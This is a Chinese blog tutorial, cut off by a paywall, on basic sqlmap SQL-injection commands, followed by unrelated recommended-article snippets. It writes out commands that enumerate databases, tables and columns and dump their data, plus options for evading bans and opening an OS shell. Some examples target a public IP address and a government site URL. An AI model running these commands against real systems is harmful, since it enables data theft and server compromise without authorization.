sqlmap(基础指令)

最新推荐文章于 2022-05-29 20:47:41 发布

echo "大佬们吃饭了"

最新推荐文章于 2022-05-29 20:47:41 发布

阅读量331

点赞数

分类专栏：渗透测试工具

本文链接：https://blog.csdn.net/weixin_45291045/article/details/108987986

版权

本文介绍了sqlmap工具的基础使用，包括通过-l参数利用日志文件进行SQL注入探测，以及通过-m参数对多个目标进行批量探测。主要涉及的指令有：-u指定注入点，--dbs获取库名，--tables获取表名，--columns获取字段名，以及--dump枚举数据。

摘要由CSDN通过智能技术生成

文章目录

常用指令
1.通过-l日志文件进行sql注入探测
2.-m通过多行文本格对多个目标进行探测

常用指令

-D指定库 -T指定表 -C指定字段

1, -u 指定注入点

python sqlmap.py -u "http://127.0.0.1:8003/?id=1"

2, --dbs 跑库名

python sqlmap.py -u "http://127.0.0.1:8003/?id=1" --dbs

3, --tables 跑表名

python sqlmap.py -u "http://127.0.0.1:8003/?id=1" -D 要查询的库名 --tables

4, --columns 跑字段名

python sqlmap.py -u "http://127.0.0.1/?id=1" -D 库名 -T 表名 --columns

5, --dump 枚举数据

python sqlmap.py -u "http://59.63.200.79:8003/?id=1" -D 库名 -T 表名 -C 字段名 --dump

常见指令
--random-agent //选择随机请求头
--delay=1 //每次探测延时1秒（防止访问过快被ban）
--level 1-5 //测试等级
--os-shell  //尝试从网站中放入一个cmdshell

1.通过-l日志文件进行sql注入探测

导出日志文件

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

echo "大佬们吃饭了"

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

Web安全工具—Sqlmap常用命令和参数（持续更新）

weixin_44431280的博客

04-07

1万+

Web安全工具—SQLMAP常用命令和参数简介：此篇文章主要记录学习注入神器sqlmap的过程，文章会对常见参数进行详解（附图），适合入门学习。一：SQLMAP介绍：简介：sqlmap是一个由python语言编写的开源自动化渗透测试工具，主要被用来检测sql注入漏洞，是一款功能强大的sql漏洞检测利用工具。支持检测的数据库：access，mysql，oracle，postgresql，sqlserver（mssql），db2等支持的注入类型：布尔盲注，时间盲注，显错注入，堆叠注入，联合查询注入等，

lua虚拟机字节码修改_[求助]lua虚拟机字节码怎么改变

weixin_33588445的博客

12-24

251

*/OP_GETGLOBAL,/* A Bx R(A) := Gbl[Kst(Bx)] */OP_GETTABLE,/* A B C R(A) := R(B)[RK(C)] */OP_SETGLOBAL,/* ...

参与评论您还未登录，请先登录后发表或查看评论

lua虚拟机字节码修改_深入Lua：虚拟机指令集

weixin_32386693的博客

12-24

615

Lua如何执行代码这一篇稍微深入一点，大概说说Lua虚拟机的指令集。试想一下原生语言是如何跑起来的？编译器将程序编译成平台相关的机器码。然后CPU一条条的执行里面的指令。指令需要的操作数放在内存中：可能在线程相关的栈里，也可能在进程相关的堆里，不管在哪里它都是一个内存地址，用间接或直接的方式从该地址取数据就是。脚本语言本质上也差不多是这样的逻辑，只不过执行这些指令的不是CPU，而是一个程序，它模拟...

lua虚拟机字节码修改,Lua-制作字节码

weixin_31139027的博客

12-24

253

So, I've been asked to make a bytecode for the simpliest code:print("Hello, world!")But I have no idea how and I can't seem to find any information on how to make one... Can someone please help? I use...

lua虚拟机字节码修改_云风的 BLOG: 虚拟机之比较，lua 5 的实现

weixin_30996983的博客

01-14

388

Commentsdouble占8个字节，在32位机器上可以用一个特殊的double来编码其它的TValuehttp://hi.baidu.com/pcall/blog/item/c83d917f5ae4003e0cd7dafe.html我做游戏也在自己设计指令集和虚拟机，有机会能探讨一下。也来凑两句。采用RB的虚拟机，编译的工作量是大一些，主要原因是虚拟寄存器的合理分配，云风以前好像也指出过。要实...

idea中的version control界面的git history不显示提交文件明细

ABCAA1024的博客

12-15

1185

idea中git查看history，以前是可以看到修改了哪些文件的：后来不知道怎么的的，不能看到被修改了哪些文件了：原因：旁边会有一条线，用鼠标拖下来就可以看到被修改的文件了！

apk解密工具_Lua脚本预编译工具

weixin_39535287的博客

11-24

1242

为了方便开发，编写了一个Lua预编译的小工具，配合我的框架 Loxodon.Framework使用，源码下载地址：Loxodon.Framework.Xlua使用Lua预编译工具可以将Lua脚本预编译为字节码文件，并且可以选择是否加密该文件。Lua官方的luac命令编译的字节码分64位和32位，如果想编译64位和32位兼容的字节码，请参考XLua的官方文件，有关通用字节码编译的部分《通用字节码》。...

Sqlmap工具

学习、分享、交流

05-29

1406

sqlmap工具：专门用于sql注入漏洞的。

sqlmap, 自动 SQL注入和数据库接管工具.zip

10-10

sqlmap, 自动 SQL注入和数据库接管工具 sqlmap sqlmap是一个开源渗透测试工具，它自动化了检测和利用 SQL注入缺陷并接管数据库服务器的过程。它具有强大的检测引擎，通过out-of-band连接访问基础文件系统，从...

sqlmap常用语句

08-14

### sqlmap基础知识 #### 1. 获取当前用户 `sqlmap.pysqlmap-u"http://www.hldcredit.gov.cn/Article/ShowArticle.asp?ArticleID=1705"--current-user` 此命令用于获取目标网站的当前数据库用户，这对于了解数据库...

在mac平台下用来将lua脚本编译成64位字节码的工具

04-27

资源中的luajit的版本是 2.1.0_beta3版本,只适用于编译64位的字节码.

lua的字节码

xphakuna的专栏

07-04

1030

lua的字节码在lopcodes.h里面那么lua编译出来的字节码是个什么东西呢？简单的修改代码就能揭开字节码的面纱

lua虚拟机字节码修改_从零开始实现 Lua 虚拟机 ( UniLua 开发过程 )

weixin_39901571的博客

12-24

541

大约是2013年初，部分由于工作需要，部分由于个人的强烈兴趣，在云风大大的指导下，我使用 C# 编写了一套较为完整的 Lua 实现： UniLua ( GitHub - xebecnan/UniLua: A pure c# implementation of Lua 5.2 focus on compatibility with Unity )可惜后来由于工作调整，用纯 c 实现的 lua 就可以...

高性能编程专题-JVM--指令码

puwan4207的博客

09-25

740

指令码常量入栈指令局部变量值转载到栈中指令将栈顶值保存到局部变量中指令 wide指令通用（无类型）栈操作指令类型转换指令整数运算浮点运算逻辑运算控制流指令——条件跳转指令控制流指令——比较指令控制流指令——无条件跳转指令控制流指令——表跳转指令控制流指令——异常和finally 对象操作指令数组操作指令方法调用指令方法返回指令线程同步指令 ...

使用luajit将lua脚本编译成字节码

06-28

6213

1、下载luajit 传送门：http://luajit.org/download.html 2、安装luajit 官方：http://luajit.org/install.html cd LuaJIT-2.0.3 make sudo make install

Lua虚拟机之字节码（三）

梦里听蝉

06-01

4731

Lua的字节码

lua虚拟机字节码修改_查看 Golang、Lua、JS、Rust、Python等语言生成的汇编代码

weixin_39908070的博客

01-09

241

为什么写这篇文章？昨天在技术群上，有人问了个问题：如果一个结构体, 只是读里面的成员, 在 golang 里面传值的时候, 不传递指针, golang 编译器会帮你优化成 const & 么?随便一猜：golang 肯定是直接 copy 整个结构体。为了确认是否真的是这样，最直白的方式就是直接看 golang 生成的汇编代码。从图中的汇编代码中，我们可以清楚的看到：golang 的确是执行...

lua虚拟机字节码修改_用 Lua 简单还原 OpCode 顺序

weixin_39552874的博客

12-24

1850

原标题：用 Lua 简单还原 OpCode 顺序前段时间外出游荡，遇上个大兄弟说能不能跑个 Lua 脚本把 Lua 里被修改的 OpCode 顺序弄出来，最近有空自己尝试一下。准备材料① 被修改 OpCode 顺序的 Lua 虚拟机程序一个，不限 SO/DLL/EXE；② 同版本的正常 Lua 虚拟机程序一个，不知道版本的同学可以从字符串里找，这里是 Lua 5.1.5；③ 随便写一个能正常编译的...

Lua字节码分析

mozhi

03-23

4694

二.lua字节码分析 Linux luac命令使用详解

sqlmap 使用指令